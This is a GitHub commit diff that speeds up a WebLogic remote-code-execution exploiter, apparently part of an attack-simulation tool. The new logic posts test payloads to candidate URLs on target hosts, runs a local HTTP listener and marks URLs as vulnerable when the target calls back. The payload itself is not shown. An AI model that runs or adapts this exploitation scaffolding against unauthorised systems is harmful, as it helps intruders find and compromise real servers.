Merge pull request #249 from VakarisZ/weblogic_performance_boost

Improved the speed of weblogic exploiter
This commit is contained in:
Daniel Goldberg 2019-01-29 15:31:32 +02:00 committed by GitHub
commit 06ff1e2a50
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 38 additions and 11 deletions

View File

@ -54,7 +54,7 @@ class WebRCE(HostExploiter):
exploit_config['upload_commands'] = None exploit_config['upload_commands'] = None
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"] # url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
exploit_config['url_extensions'] = None exploit_config['url_extensions'] = []
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable. # stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
exploit_config['stop_checking_urls'] = False exploit_config['stop_checking_urls'] = False

View File

@ -13,13 +13,16 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import threading import threading
import logging import logging
import time
__author__ = "VakarisZ" __author__ = "VakarisZ"
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
# How long server waits for get request in seconds # How long server waits for get request in seconds
SERVER_TIMEOUT = 4 SERVER_TIMEOUT = 4
# How long to wait for a request to go to vuln machine and then to our server from there. In seconds # How long should be wait after each request in seconds
REQUEST_DELAY = 0.0001
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
REQUEST_TIMEOUT = 2 REQUEST_TIMEOUT = 2
# How long to wait for response in exploitation. In seconds # How long to wait for response in exploitation. In seconds
EXECUTION_TIMEOUT = 15 EXECUTION_TIMEOUT = 15
@ -66,18 +69,41 @@ class WebLogicExploiter(WebRCE):
print(e) print(e)
return True return True
def check_if_exploitable(self, url): def add_vulnerable_urls(self, urls, stop_checking=False):
"""
Overrides parent method to use listener server
"""
# Server might get response faster than it starts listening to it, we need a lock # Server might get response faster than it starts listening to it, we need a lock
httpd, lock = self._start_http_server() httpd, lock = self._start_http_server()
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port) exploitable = False
for url in urls:
if self.check_if_exploitable_weblogic(url, httpd):
exploitable = True
break
if not exploitable and httpd.get_requests < 1:
# Wait for responses
time.sleep(REQUEST_TIMEOUT)
if httpd.get_requests > 0:
# Add all urls because we don't know which one is vulnerable
self.vulnerable_urls.extend(urls)
self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
else:
LOG.info("No vulnerable urls found, skipping.")
self._stop_http_server(httpd, lock)
def check_if_exploitable_weblogic(self, url, httpd):
payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
try: try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False) post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
except exceptions.ReadTimeout: except exceptions.ReadTimeout:
# Our request does not get response thus we get ReadTimeout error # Our request will not get response thus we get ReadTimeout error
pass pass
except Exception as e: except Exception as e:
LOG.error("Something went wrong: %s" % e) LOG.error("Something went wrong: %s" % e)
self._stop_http_server(httpd, lock)
return httpd.get_requests > 0 return httpd.get_requests > 0
def _start_http_server(self): def _start_http_server(self):
@ -94,7 +120,8 @@ class WebLogicExploiter(WebRCE):
lock.acquire() lock.acquire()
return httpd, lock return httpd, lock
def _stop_http_server(self, httpd, lock): @staticmethod
def _stop_http_server(httpd, lock):
lock.release() lock.release()
httpd.join(SERVER_TIMEOUT) httpd.join(SERVER_TIMEOUT)
httpd.stop() httpd.stop()
@ -168,8 +195,8 @@ class WebLogicExploiter(WebRCE):
we determine if we can exploit by either getting a GET request from host or not. we determine if we can exploit by either getting a GET request from host or not.
""" """
def __init__(self, local_ip, local_port, lock, max_requests=1): def __init__(self, local_ip, local_port, lock, max_requests=1):
self._local_ip = local_ip self.local_ip = local_ip
self._local_port = local_port self.local_port = local_port
self.get_requests = 0 self.get_requests = 0
self.max_requests = max_requests self.max_requests = max_requests
self._stopped = False self._stopped = False
@ -184,7 +211,7 @@ class WebLogicExploiter(WebRCE):
LOG.info('Server received a request from vulnerable machine') LOG.info('Server received a request from vulnerable machine')
self.get_requests += 1 self.get_requests += 1
LOG.info('Server waiting for exploited machine request...') LOG.info('Server waiting for exploited machine request...')
httpd = HTTPServer((self._local_ip, self._local_port), S) httpd = HTTPServer((self.local_ip, self.local_port), S)
httpd.daemon = True httpd.daemon = True
self.lock.release() self.lock.release()
while not self._stopped and self.get_requests < self.max_requests: while not self._stopped and self.get_requests < self.max_requests: